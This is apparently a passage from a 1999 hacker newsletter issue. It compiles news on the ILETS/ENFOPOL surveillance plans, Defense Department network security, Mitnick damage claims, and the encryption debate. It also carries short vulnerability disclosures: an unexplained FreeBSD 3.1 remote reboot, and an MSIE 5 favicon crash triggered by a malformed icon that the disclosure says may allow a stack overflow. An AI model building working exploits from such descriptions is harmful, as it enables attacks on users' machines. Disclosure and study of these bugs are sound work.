he sees the truth hidden in the lies. he feels there is something more...
and there is
there is freedom, concealed in the shadows.
there is beauty, woven into the words.
there is hope, the undying hunger for the future.
this is the world as it is, not hidden behind billboards. this is life, the
thirst for adventure and lust for living. this how it should be,
survival of the fittest.
phiregod
liquidphire@hotmail.com
forgive me for all errors
i welcome feedback in all forms as long as you can present your opinion and
support it.
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com
-=-
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Issue #17, 'w00t'
*
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 The FBI and the ENFOPOL wiretapping secret organization ILETS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by weld
An FBI-founded organization called ILETS, which has met in secret for 6 years, has led
initiatives around the world to build comprehensive interception systems into new
telecommunications systems. This include requiring European ISPs to have special sniffing
equipment installed on their networks.
ILETS AND THE ENFOPOL 98 AFFAIR
http://www.heise.de/tp/english/special/enfo/6398/1.html
THE ENFOPOL 98 AFFAIR
http://www.heise.de/tp/english/special/enfo/6397/1.html
SPECIAL INVESTIGATION: ILETS AND THE ENFOPOL 98 AFFAIR
Duncan Campbell 29.04.99
America's guiding hand revealed - the secret international organisation behind Europe's
controversial plans for Internet surveillance
Europe's 21st century tapping plans were born in an unlikely location. Fifty kilometres south of Washington
DC, on the swampy western boundaries of the Potomac river is Quantico, Virginia. Here, on a large military
reservation, is the FBI's training academy and research and development centre. Members of the public
have no access to the high security site.
Between 1990 and 1992, the FBI had tried repeatedly to get the US Congress to pass new laws for telephone
tapping. The agency was worried that new digital telephone systems did not allow them easy access to track and
intercept their targets. Their goal was to turn every type of modern communications systems into a national and,
ultimately, global surveillance network which would give them "real time, full time" access to those whom they wanted to
watch.
The FBI experts ignored the costs imposed by their demands. They wanted manufacturers and network operators to
provide systems at their own expense. Nor were they interested in the checks and balances of laws intended to control
monitoring and protect privacy. Lawyers were not invited. Civil society would have to pay its own costs.
Faced with the roadblocks in Congress, early in 1993 the FBI tried a new approach. They
invited US allies to come to Quantico. Law enforcement and security agency representatives
met there, calling themselves the "International Law Enforcement Telecommunications
Seminar". Seen in retrospect, the title "seminar" is a black joke. Acting in secret and without
parliamentary knowledge or government supervision, the FBI through ILETS has since 1993
steered government and communications industry policy across the world. In the shadows behind the FBI stood the
NSA (National Security Agency), whose global surveillance operations could only benefit if, around the world, users
were systematically to be denied telecommunications privacy in the information age.
The countries who came to Quantico in 1993 were traditional US intelligence allies like Canada, the UK and Australia.
There was also a core Euro group interested in developing extended surveillance systems - Germany, France, the
Netherlands, Sweden (and the UK). Other representatives came from Norway, Denmark, Spain and even Hong Kong.
The FBI tabled a document called "Law Enforcement Requirements for the Surveillance of Electronic
Communications", written in July 1992.
In June 1993, EU ministers meeting in Copenhagen agreed to poll member states on the issues raised by the FBI and
by ILETS. After discussions in Europe later in 1993, ILETS met in Bonn early in 1994. By now Austria, Belgium,
Finland, Portugal and Spain had joined the 19 member group.
At their Bonn meeting, ILETS agreed joint policy in a document called "International
Requirements for Interception". This said that "law enforcement representatives and
government telecommunications experts from a number of countries that attended an
international workshop on interception and advanced telecommunications technologies
identified the need for this document". It was their "common requirements". Attached to the
two page ILETS policy paper was a detailed, four page set of monitoring requirements and a glossary. This list of
"International User Requirements" was identified as "IUR 1.0" or "IUR95".
The ILETS meeting in Bonn also instigated two new policies. ILETS wanted international standards bodies such as the
ITU (International Telecommunications Union) and ISO (International Standards Organisation) to build in tapping
requirements to new system specifications. ILETS also wanted governments to agree on monitoring across international
boundaries, so that one agency could intercept communications in another country.
In March 1994, the Dutch government proposed that Europe adopt IUR 1.0. But ministers were not told that the
document had been written by ILETS. Instead, it was identified as an ENFOPOL document, eventually being called
ENFOPOL 90. (ENFOPOL is a standard European Commission classification for documents concerned with Law
Enforcement/Police matters.)
European Ministers never discussed ENFOPOL 90. It was agreed by a "written procedure", by exchange of telexes. It
remained completely secret for nearly two years, and was not published in the Official Journal of European policy until
November 1996. Meanwhile, European telecommunications operators were told to fall in line with its requirements.
According to the British Home Office (Interior Ministry), for example, the resolution is "used as a basis for discussion
with telecommunications operators in accordance with [UK monitoring legislation]".
ILETS had also raised the problem of satellite-based mobile phone systems (such as Iridium). These phone systems link
subscribers via satellites that are not under government control. This led to a British proposal to the European
Commission:
"Governments ... will have to create new regulations for international co-operation so that the necessary surveillance
will be able to operate."
In a slightly modified form, IUR 1,0 became law in the United States in October 1994. Other European nations, and
Australia, later incorporated it in their domestic legislation. Within two years from the first ILETS meeting, the IUR had,
unacknowledged and word for word, become the secret official policy of the EU and law around the world.
Sixteen Nations from ILETS met again in Canberra in 1995 and agreed to try and persuade international standards
organisations to adopt the IUR "requirements". This would mean that manufacturers of new exchanges or
communications systems would have to build in interception interfaces in order to meet the international standards, free
of charge. If this ploy succeeded, then security and law enforcement agencies would save money and make tapping
easier, since new networks would come with monitoring systems built in.
At their Canberra meeting "participating countries undertook to write to "relevant standards
bodies and committees" informing them that their country along with other countries has
adopted the IUR as a basis for its national and system-specific requirements .... ".
Once again ILETS succeeded. In June 1997, the Australian government persuaded the
International Telecommunications Union (ITU) to adopt the IUR requirements as a "priority".
They told the ITU that "some countries are in urgent need of results in this area".
During 1995 and 1996, through the European Commission, ILETS also effectively turned the IUR into an international
treaty. The EU invited countries who had attended ILETS meetings to endorse the still-secret 1995 monitoring policy -
that is, IUR 1.0.
Non-EU ILETS members were told that "the Council considers that the lawful monitoring of telecommunications
systems is an important tool in the prevention and detection of serious crimes and in safeguarding national security. ...
The Member States of the European Union have been called upon to apply those Requirements to telecommunications
operators and service providers... " Canada, Australia, Norway and the United States wrote back to the EU president,
confirming their agreement
By now, ILETS had spawned two sub committees, one re-designing the IUR and another (called STC, the Standards
Technical Committee) working on technical standards. ILETS and its experts met again in Dublin in 1997. In 1998,
they met in Rome, Vienna and Madrid. The IUR was not changed in 1997. But ILETS and its expert committees were
at work, defining new requirements to cover the Internet and satellite based systems. They also wanted stringent new
security requirements to be imposed on private telecommunications operators.
The expert committees drew up new "requirements" to intercept the Internet. During July
1998, ILETS experts met in Rome to settle the new IUR and its attached "glossary". The
result was ENFOPOL 98 . In Vienna on 3 September 1998, the revised IUR was
presented to the Police Co-operation Working Group. The Austrian Presidency proposed
that, as had happened in 1994, the new IUR be adopted verbatim as a Council Resolution on
interception "in respect of new technology". Delegates were told that ENFOPOL 98's purpose
was to "clarify the basic document (IUR 1.0) in a manner agreed by the law enforcement agencies as expressing their
common requirement".
But ILETS and its experts had become overconfident. IUR 1.0 had been four pages long. The new IUR (ENFOPOL
98) was 36 pages. The Austrian officials were told that this was politically inadvisable - perhaps that it would frighten
ministers by its explicitness. Or, as the IUR experts were later told, "the wide range covered by ENFOPOL 98 was not
conducive to ready comprehension".
In October 1998, ILETS' IUR experts met in Vienna and Madrid and agreed a shorter, 14 page paper. Some of its
more controversial provisions were put into other papers. European police delegates met in November to consider and
agree the revised ENFOPOL 98 (rev 1).
Suddenly, there was a new factor for the ILETS experts to consider. On 20 November, Telepolis broke the
ENFOPOL 98 story, publishing the full text in German nine days later. The story became Internet news around the
world. After this, and thanks to two further revisions by the German presidency, ENFOPOL 98 (now renamed
ENFOPOL 19 - see news story ) shrank to a mere 6 pages long. Its key provisions are being hidden elsewhere.
The most chilling aspect of the ILETS and ENFOPOL story may not even be the way in which the US-led organisation
has worked in the dark for more than 6 years to built snooping trapdoors into every new telecommunications system.
Their determination to work in the dark, without industry involvement or legal advice, without parliamentary scrutiny or
public discussion, has blinded them to the idea that not all "law enforcement" is a public good.
Throughout its life, Hong Kong - now incorporated in the People's Republic of China - has been a member of ILETS.
By planting its requirements on bodies like the ITU and ISO, the police and security agencies involved have effectively
acted as an international treaty organisation.
But they were blind to any interests other than their own narrow world-view. "In the name of law and order, the US is
now pursuing an international accord that urges stronger surveillance capabilities in nations with appalling human-rights
records" says Susan Landau, co-author of Privacy on the Line.
By taking Hong Kong into their club, they have shared their advanced ideas on surveillance with the butchers of
Tienanmen Square. By seeking the ITU's imprimatur on building surveillance into new communications systems, they
have handed the vile butchers of the Kosovans and the Kurds the future tools to seek out and murder their opponents.
The new IUR will be welcome news in Thailand and Singapore, and everywhere where enemies of liberty thrive.
Even if you are a conservative European or US politician, this can only be a source of shame. ILETS has thrown the
vital principles of the European Convention and the US Constitution into the dustbin. That, above all, is why the secret
processes of ENFOPOL 19, 98 and the rest should be brought to a halt. Democratic society requires nothing less than
full and considered public discussion of these important issues.
-=-
THE ENFOPOL 98 AFFAIR
Duncan Campbell 29.04.99
Euro police press on ... and America's guiding hand is revealed
THE LATEST VERSION of the ENFOPOL 98 interception plan has just been leaked in London. It reveals
that although the name of the key document has been changed, European Commission officials still want to
make tapping the Internet official European policy by the end of May. They are pressing on, despite strong
domestic opposition in Germany and Austria and recent condemnation by the European Parliament.
The new document is called ENFOPOL 19. It was obtained this week by Caspar Bowden of the London-based
Foundation for Information Policy Research .
ENFOPOL 19 was written at a police officials' meeting in Brussels on 11 March, and was issued by the German
presidency on 15 March. According to the British government, "the German Presidency has indicated that it hopes to
seek agreement to the draft Council Resolution at the Justice and Home Affairs Council in May". The Council will meet
on 27-28 May.
ENFOPOL 19 still concerns "interception of telecommunications in relation to new technologies". But instead of
detailing massive new requirements for tapping the Internet and other new communications systems, the police group is
now pretending that it is not a new policy at all.
Referring to the first European tapping plan of 1995, ENFOPOL 19 says that "the requirements of law enforcement
agencies ... are applicable both to existing and new communications technologies, for example satellite
telecommunications and Internet telecommunications". Thus, it claims, the "technical terms" in the 1995 plan "are to be
interpreted as applying to ... in the case of the Internet, the static and dynamic IP address, credit card number and
E-mail address". In fact, the 1995 policy says nothing about credit card numbers being used to tap
telecommunications.
The new document points out that when tapping the Internet, it is not necessary to ask for the details of the sender and
the recipient, because these are included in every "datagram" or IP packet. So new regulations for the Internet may not
be needed.
But this is a deceptive manoeuvre. Successive redrafts of ENFOPOL 98 reveal that the original, highly controversial
plan exposed by Telepolis has been broken up into at least five parts, which are now being handled separately:
Plans for tapping Iridium and other satellite-based personal communications systems have been separated and
are being discussed at a high level in the Commission;
Part of ENFOPOL 98 which set out new requirements for personal data about subscribers will be included in
"other Council Resolutions to be adopted";
Another resolution will require Internet Service Providers to set up high security interception interfaces inside
their premises. These "interception interfaces" would have to be installed in a high security zone to which only
security cleared and vetted employees could have access. This is not included in ENFOPOL 19;
ENFOPOL 19 also suggests that some tapping systems could operate through a "virtual interface". This would
mean installing special software at Internet access points, controlled remotely by government security agencies.
A fourth new policy concerning cryptography is now being dealt with separately.
The police group now plan that the old and new resolutions will be put into a monitoring "manual", together with detailed
instructions on intercepting the Internet. This will include "technical descriptions" which have been taken out of the
original ENFOPOL 98 . If this manoeuvre succeeds, then ENFOPOL 98 will escape scrutiny by being smuggled
through in parts, while the European Parliament is dissolved (because of the June Euro-elections).
But the biggest secret about ENFOPOL 98 has never been told, until now. The controversial document wasn't written
by European governments or the European Commission. Both ENFOPOL 98 and Europe's 1995 monitoring policy
were written by a US-dominated group of security and law enforcement agency experts, called ILETS. This group
does not include any industry or human rights and privacy law advisers.
Over the last six years, ILETS has single-handedly forced governments and international standards bodies to build in
their "requirements" to laws, networks and new communications systems. Their activities have never been reported to
national Parliaments, the European Parliament or even the US Congress.
Not until Telepolis revealed the ENFOPOL 98 affair has the secret ILETS organisation been exposed or challenged.
@HWA
04.0 NIPRNET to beef up security by *koff* installing firewalls...(wah hahahahaha)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NIPR to install Firewalls to Thwart Hackers
From HNN http://www.hackernews.com/
contributed by erehwon
The factual inaccuracies in this article are blatant. The Defense Information Systems Agency (DISA) plans to
redesign its Non-Classified Internet Protocol Router Network (NIPRNet). While this article touts this
'redesign' as some sort of massive undertaking it sounds like they are just going to install a few firewalls.
Oh, yeah, that will keep all the hackers out.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0503/fcw-newsdodnet-5-3-99.html
MAY 3, 1999
DOD net overhaul to thwart hackers
BY BOB BREWIN (antenna@fcw.com)
The Defense Department has started an overhaul of its global unclassified
network to fight off the barrage of hacker attacks the department's systems
suffer and to increase capacity to handle a huge rise in traffic to and from the
Internet.
The Defense Information Systems Agency plans to redesign its
Non-Classified Internet Protocol Router Network, DOD's primary entry into
commercial World Wide Web sites, to take advantage of enhanced security
measures and to improve overall performance.
The NIPRNET redesign, scheduled for completion in December with main
network components slated for installation no later than June, will provide
DOD with a network better designed to stave off hacker attacks that hit
DOD systems at a rate of 250,000 a year, according to a DOD source
briefed on the network plan.
Tony Montemarano, chief of Defense Information Systems Network services
for DISA, said the agency is well on its way with the NIPRNET upgrade.
"The equipment is purchased, and we are upgrading software loads,"
Montemarano said.
He said that besides providing security, the NIPRNET upgrade also will
provide "protection against denial-of-service attacks.... We want to be able to
guarantee the availability of the network as well as provide additional security
for the users."
DISA's plans include the filtering of what DISA called "notorious" protocols
routinely exploited by hackers, according to briefing slides obtained by
Federal Computer Week.
The protocols include the PostOffice Protocol (POP), which allows remote
users to read e-mail stored on a central server; remote-access protocols,
which allow users to read their e-mail from another system; and Packet
Internet Groper (Ping), which hackers use to disable networks by overloading
them with a command.
According to the briefing slides, DISA plans to start filtering out these
protocols by July. But the agency said it has not made any decision yet on
which protocols to filter.
Montemarano declined to quantify the degree of security that the NIPRNET
upgrade will provide, except to say, "It will be better...and performance will
be improved considerably."
DISA is doubling the number of NIPRNET connections to the Internet
because of the huge increase in traffic spurred by the development of the
World Wide Web and the amount of information residing on Web sites
outside NIPRNET, Montemarano said. "There is so much information out
there our users want," he said.
Increasing capacity also is a security measure. The inability of NIPRNET to
handle the loads imposed by Web traffic without lags or delays had resulted in
numerous military commands installing Internet "backdoors" on their systems.
DISA is looking to eliminate such backdoor connections. According to the
DISA briefing, no unit or command will be allowed to connect a local- or
wide-area network to NIPRNET until the network goes through a formal
connection approval process.
Rear Adm. John Gauss, commander of the Space and Naval Warfare
Systems Command, said he believes the NIPRNET redesign offers a better
security alternative than the almost total retreat from the Internet advocated by
Lt. Gen. William Campbell, the Army's director of information systems for
command, control, communications and computers.
"Campbell accurately addressed the threat," Gauss said, "but the thing I have
to ponder is, [considering] the amount of electronic commerce we do with
industry, is it viable just to disconnect from the Internet? What DISA is doing
will protect DOD computing and still give us a viable means of communicating
with industry."
@HWA
05.0 Mainstream media questions some of Mitnicks accrued damages
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Hacker" Racks up $291.8 Million in Damages.
From HNN http://www.hackernews.com/
contributed by Weld Pond
Finally some mainstream press about the outrageous claims made by NEC America Inc., Nokia Mobile Phones,
Sun Microsystems Inc. and Novell Corp. These companies claim substantial losses that they have
attributed to Kevin Mitnick.
LA Times
http://www.latimes.com/HOME/BUSINESS/CUTTING/t000039748.1.html
Letters citing damages
http://www.hackernews.com/orig/letters.html
FREE KEVIN
http://www.freekevin.com
Heard on the Beat
Firms Say Hacker Cost Them $291 Million
By GREG MILLER
LA Times
For a guy who never seemed to profit from his hacking habit, Kevin Mitnick sure took a
big bite out of the high-tech economy, if newly disclosed damage estimates from his victim
companies are to be believed. Mitnick's hacking cost high-tech companies at least $291.8
million over a two-year span before his capture, according to estimates provided to the
FBI by NEC America Inc., Nokia Mobile Phones, Sun Microsystems Inc. and Novell Corp.
The damages are listed in previously undisclosed letters that were obtained by 2600
magazine, a pro-hacker publication that has posted the letters on its Web site.
The damage estimates vary widely. NEC said Mitnick stole software code worth $1.8 million.
But Nokia figures Mitnick cost the company at least $135 million, including $120 million in lost
revenue "due to new developments being delayed in reaching the market."
Skeptics say the estimates border on fantasy and point out that the companies did not report
these hefty setbacks in public financial statements.But the estimates underscore the ambiguities of
assessing damages in hacking cases.Some argue that hackers should be accountable for the cost of
developing the software they steal, even though they are only taking a copy. Mitnick himself once
argued that was akin to saying someone who shoplifts a 49-cent Bic pen ought to be accountable for
the millions of dollars Bic has spent developing and marketing it.The issue is still significant for
Mitnick, who pleaded guilty to various hacking charges last month but awaits a ruling on the restitution
he will be ordered to pay victims. "We're going to make a submission for an amount of restitution we
consider appropriate," said Assistant U.S. Atty. Chris Painter, "not necessarily the full amount of the
loss that was caused."
Copyright 1999 Los Angeles Times. All Rights Reserved
@HWA
06.0 CyberCrooks easier to catch?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sangfroid
This Associated Press article seems to think that cyber crooks are easier to catch. Using the authors
of Melissa and CIH as well as the man who posted a false news story causing fluctuations in a companies
stock as examples for this claim. Unfortunately the author has little or no understanding of how the net
actually works.Bad guys are not getting easier to catch there are just more stupid ones.
Las Vegas Sun
http://www.lasvegassun.com/sunbin/stories/tech/1999/apr/30/043000242.html
April 30, 1999
Catching Hackers Becoming Easier
ASSOCIATED PRESS
NEW YORK (AP) -- They never unmasked the hacker responsible for Michelangelo, a famous computer
virus that threw a scare into the high-tech world in 1992.
But it took just days to identify the people believed responsible for two viruses that struck this year.
Cybercops also had no trouble finding the man who allegedly posted a fake news story this month about a
corporate merger that caused one company's stock to gyrate.
In at least two of these cases, investigators used the digital footprints that every user of the Internet
leaves behind to trace the source of the trouble.
While this may force virus writers or hoaxers to think twice before they strike, it also shows how easy it
is for anyone -- a government investigator or a skilled salesperson -- to follow your every online move.
"The same technology that tracks individuals is used to solve crimes and vice versa," said Ari Schwartz, a
policy analyst for the Center for Democracy and Technology, an Internet civil liberties group in
Washington. "It's melded into one kind of surveillance technology which could lead to an erosion of privacy."
Actually, there's nothing all that complicated about how the law enforcers crack a case on the World Wide
Web. In fact, it's similar to the way telephone records are used by investigators.
The online accounts that most people use to roam the Web or send e-mail are assigned a unique stamp, or
"Internet protocol address," that helps direct the exchange of data between a Web site and its visitors.
Those IP addresses leave digital footprints that -- unfortunately for the ill-intentioned -- don't get wiped
out as easily or quickly as a trail of bread crumbs.
Little is known about Chen Ing-hau, the 24-year-old Taiwanese man identified on Thursday as the author
of Chernobyl, a virus that crippled hundreds of thousands of computers this week. But IP addresses
were clearly pivotal in tracking down the alleged merger hoaxter, Gary Dale Hoke.
The 25-year-old North Carolina man was arrested two weeks ago after he allegedly posted a fictional story
April 7 saying his employer, PairGain Technologies, was about be taken over by another company. The
false report caused PairGain's stock to rise sharply, then fall after the hoax was uncovered.
Hoke, officials said, attempted to conceal his identity with pseudonyms and fake e-mail addresses, but was
identified through an IP address. He was charged Friday with five counts of securities fraud, punishable
by up to 50 years in prison and $5 million in fines. IP addresses were also used to track down David L.
Smith, a 30-year-old network programmer from New Jersey accused of creating the Melissa e-mail virus
with a stolen America Online account.
Melissa, allegedly named after a topless dancer in Florida, appeared on March 26 and spread rapidly
around the world, clogging e-mail accounts and shutting down computer networks worldwide.
But IP addresses weren't the only clues used in the Melissa investigation, and that's what troubles privacy
advocates.
The main difference in the Melissa investigation was the use of a serial number embedded in documents
written with the popular program Microsoft Word.
"We could go around society with tattoos on our forehead and cameras everywhere, but most people
wouldn't like that. But that's what these serial numbers do," said Schwartz, whose organization has filed a
federal complaint over a similar serial number embedded in Intel's new Pentium III computer chip.
"Law enforcement has a lot of tools out there to find out who these people are. We want them to find
crooks," Schwartz said.
"But when we make technology, do we want technology that brands individuals, that's puts our
serial numbers everywhere as we visit? There has to be some sense of anonymity online."
@HWA
07.0 Nasa has security concerns, doesn't report cyberattacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
Roberta Gross, NASA's inspector general, told a Senate subcommittee that parts of NASA are failing to report
cyber attacks and that some do not have proper security in place. She went on to claim that an internal
NASA organization, NASA's Automated Systems Incident Response Capability, was not performing its job
adequately.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0503/fcw-newnasa-5-3-99.html (ed's note, this gave me a 404 when I tried it
i'll try and find the correct link and post the article here)
Roberta Gross also is quoted in this article as saying that although the attacks where not reported her office
learned of them from "other ways". Hmmmmm, wonder what that means
@HWA
08.0 Encryption debate called for
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee said he would like to see a
campaign-style debate on encryption pitting members of Congress and the Clinton administration against U.S.
lawmakers.
CNN
http://www.cnn.com/TECH/computing/9905/04/encryption.idg/index.html
U.S. advisor seeks full-blown
debate on encryption
May 4, 1999
Web posted at: 7:51 a.m. EDT (1151 GMT)
by Margret Johnston
(IDG) -- The chairman of an organization that advises the U.S. Congress on Internet issues yesterday said he
would like to see a campaign-style debate on encryption pitting members of Congress and the Clinton administration
who oppose relaxing U.S. encryption laws against U.S. lawmakers who favor loosening them.
Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee, said he would push for the
debate to be held sometime this year. He added that he would favor participation from U.S. lawmakers who have
spoken out against relaxing U.S. restrictions on the export of encryption technology above 56 bit.
"I want a face-to-face debate," Berman said during a luncheon for congressional staff members sponsored by the
caucus. "Let them go at it."
Sen. Diane Feinstein (D-Calif.) and Rep.Michael Oxley (R-Ohio) would be ideal participants, Berman said. And the
director of the FBI Louis Freeh would be another good candidate to take part in the debate.But there has been no
agenda or date set for the event, Berman said.
The two lawmakers and Freeh have opposed legislation that would change the current U.S. encryption law on the
grounds that it would weaken law enforcement's ability to catch suspected criminals, particularly terrorists and
drug dealers, because they could use the high-level encryption to prevent access to potential evidence stored on
their computers.
Supporters of a change in U.S. encryption law say those arguments are baseless because high-level encryption is
easily obtainable and the U.S. law has only hamstrung American businesses who want to sell and use such
encryption outside the U.S.
Berman announced that, in addition to the encryption forum, the caucus by year-end would hold forums on privacy,
content and broadband technology.
"The goal is to educate policy makers about the Internet as a technology," Berman said. "We need to explain to
policy makers what these issues are."
The Internet Caucus Advisory Committee comprises 120 public interest groups, corporations and associations.
Members typically favor maintaining the decentralized, deregulated global aspects of the Internet, Berman said.
He added that the caucus got off the ground because Congress passed the Communications Decency Act (CDA) without
first asking itself whether it fully understood technology and how the Internet works.
The CDA was later ruled unconstitutional by the Supreme Court.
@HWA
09.0 Product: Hackers stopped cold by 'BlackICE'?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/TECH/computing/9904/22/blackice.idg/
Start-up puts hackers on
BlackICE
April 22, 1999
Web posted at: 1:35 p.m. EDT (1735 GMT)
by Ellen Messmer
(IDG) -- Network Ice, a hot security start-up for intrusion detection, this June plans to ship its
first software-based suite for stopping the wily hacker cold.
To protect Windows-based desktops and servers from hack attacks, Network Ice is providing software
called BlackICE Pro. If BlackICE software spots evidence of mischief, it responds by alerting the user
or the administrator of the problem. It can also shut down all communication to and from the source of
the intrusion attempt.
BlackICE Pro software, which costs $37 per node for 1,000 nodes, will issue a report of any trouble to
the Web-based security management console called ICEcap (an acronym for "consolidation, analysis and
presentation").
According to Greg Gilliom, CEO of Network Ice, the ICEcap reporting engine uses a technology dubbed
"Collective Awareness" to analyze the nature of the intrusion attempt. If needed, it will inform all
BlackICE-protected desktops or servers if a systemic corporate-wide attack appears to be under way.
Since hackers are constantly upgrading their attack exploits, the BlackICE software is going to have to
be updated regularly, much like anti-virus software, Gilliom points out. To do this, ICEcap can "push"
intrusion-detection updates down to BlackICE software without disrupting computer activity.
"We detect over 200 attack signatures, such as ping sweeps or denial-of-service attacks,"
Gilliom claims. "We're protocol experts - we know how to exploit protocols. But we're trying
to provide a system of administration and protection for small companies that aren't aware
of all these issues."
Gilliom and the other Network Ice co-founders Robert Graham and Clinton Lum all held senior
engineering positions at Network General (now Network Associates after its merger last year with McAfee
Associates).
The BlackICE suite is host-based intrusion-detection software for Windows.
The start-up is also working on an NT-based probe called BlackIce Sentry
that would be able to scan for trouble Unix machines, mainframes or
databases. The company has no specific shipping date for BlackIce Sentry.
Network Ice Chief Technology Officer Robert Graham says that one of the most vulnerable points within
the enterprise network today is that presented by the telecommuter or remote access user.
"The problem with VPNs and notebook computers is that firewalls are being bypassed by remote dial-in users,"
Graham says. "When we've put our software on a lot of people's machines, we see virtually everyone will
undergo a hacker attack within just a few weeks."
This is because the hackers with their automated tools are targeting remote access users to find out their
IP addresses or access methods in order to weasel their way into the corporate intranet, Graham claims.
Therefore, even companies using VPNs or firewalls can benefit from a desktop-based intrusion-detection system
used for remote access. "We see three types of hackers out there," Graham says. "There are voyeurs, like
peeping toms; graffiti artists that trash the Web site and tell their friends; and criminals who steal things,
such as customer lists."
@HWA
10.0 FreeBSD 3.1 remote reboot exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Approved-By: aleph1@UNDERGROUND.ORG
Message-ID: <19990501031840.A24252@dilbert.exodus.net>
Date: Sat, 1 May 1999 03:18:40 -0500
Reply-To: jamie@exodus.net
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Jamie Rishaw <jamie@exodus.net>
Subject: FreeBSD 3.1 remote reboot exploit
To: BUGTRAQ@netspace.org
Hi,
Sorry to be so vague, but I wanted to let everyone know,
It's been demonstrated to me by two people who will not reveal "how"
that there is a remote bug exploit, almost certainly over IP, that will
cause FreeBSD-3.1 systems to reboot with no warnings.
The second box this was demonstrated on today had no open services
besides ircd, and was remote rebooted. (The first box had open services
such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
as the culprit).
If anyone can shed some light on this (really bad) issue, it'd be
greatly appreciated, especially since I am(was) in the process of
upgrading all of my boxes to 3.1. (3.1-REL).
Regards,
-jamie
--
jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc.
>Sr. Network Engr, Chicago, SoCal Data Centers
<jimmie> In an interesting move Exodus Communications annouced today that
they have replaced all of their backbone engineers with furby's
@HWA
11.0 More on the MSIE favicon.ico bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://web.cip.com.br/flaviovs/sec/favicon/index.html
MSIE 5 favicon bug
Description
There's a bug in MSIE 5 when handling the favicon.ico file downloaded from a web site. By creating a icon file with bad data, it's possible to crash MSIE 5. The
stack is filled with information from the icon file so it may be possible to create an icon file with data which would end executing code on the client machine.
The favicon.ico icon file
The favicon.ico file is an icon file in the MS-proprietary icon file format. It is downloaded by MSIE 5 when the user asks it to add the
page's URL to his/her "Favorites" list. When the user selects to add the URL, MSIE 5 downloads the file and shows the icon on the
"Favorites" menu. The request for the favicon.ico file is first done on the same path of the current URL. If the file is not found, MSIE 5
will backup one directory in the directory hierarchy and try again. It will do this until it finds the file or reaches the web server root (e.g. if
you try to bookmark this page, MSIE 5 will look for favicon.ico in http://web.cip.com.br/flaviovs/sec/favicon/,
http://web.cip.com.br/flaviovs/sec/, http://web.cip.com.br/flaviovs/ and http://web.cip.com.br/).
Impact
MSIE 5 will crash when trying to interpret/show such icon file. It's unknown if it's possible to create an icon file which will trigger code execution on the client
machine, but evidences show that it may be possible (i.e. it looks like a stack buffer overflow).
Workaround
It seems it's not possible to turn off the favicon.ico loading feature. Thus the only workaround is not to add any non-trusted site to the "Favorites" list and wait for
a patch from Microsoft.
Example
If you're using MSIE 5 with Javascript enabled, you can feel the bug in action. Otherwise just try to bookmark this page (note: this will crash your browser).
Here's the favicon.ico file that triggers the bug. It's composed of an bogus header followed by lots of "A" characters.
What Microsoft is Doing
Apparently, nothing. I reported the bug twice, the first one about one month ago, the last time about two weeks ago. I didn't receive any reply.
Disclaimer
All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by
the use or minuse of information here contained.
Related Documents
Web Workshop Getting Ready for Internet Explorer 5
http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp
Apache Week: 9th April 1999
http://www.apacheweek.com/issues/99-04-09
Privacy Issues about the favicon.ico File (below)
About
This bug was discovered in april 1999 by Flavio Veloso <flaviovs@centroin.com.br>.
Privacy Issues about the favicon.ico File
Description
Every time you bookmark a page in MSIE 5 it will send to the web server a request for a file named favicon.ico (see "MSIE 5 favicon bug" for an explanation
about what this file is, along other nice things). This give to web servers admins a way to know that someone has bookmarked it's site; the info includes the date and
time of the operation plus the address IP of the machine which bookmarked the site. This may or may not bother you.
Impact
MSIE 5 will reveal to web servers admins that you bookmarked their sites.
Workaround
It seems that it's not possible to turn off this feature, so if this bother you, don't bookmark sites with MSIE 5 or don't use it at all.
What Microsoft is Doing
Microsoft was not contacted about this issue. They were already informed about a a much more dangerous issue about the favicon.ico file and took no measure
to fix it in about one month. I don't have plans to contact them about this privacy issue just because I don't want to waste my time anymore with this.
Disclaimer
All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by
the use or minuse of information here contained.
About
This issue was discovered in april 1999 by Flavio Veloso <flaviovs@centroin.com.br>.
@HWA
12.0 Simple Nomad sheds some light on the Phone Masters
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Last week we followed up a story from HNN on the Phone Rangers/Phone Masters the actual proper group
name was the PHONE MASTERS and NOT the 2600 group the Phone Rangers, we aplogize for the inaccuracy.
From HNN http://www.hackernews.com
More Info on Phone Masters
contributed by Simple Nomad
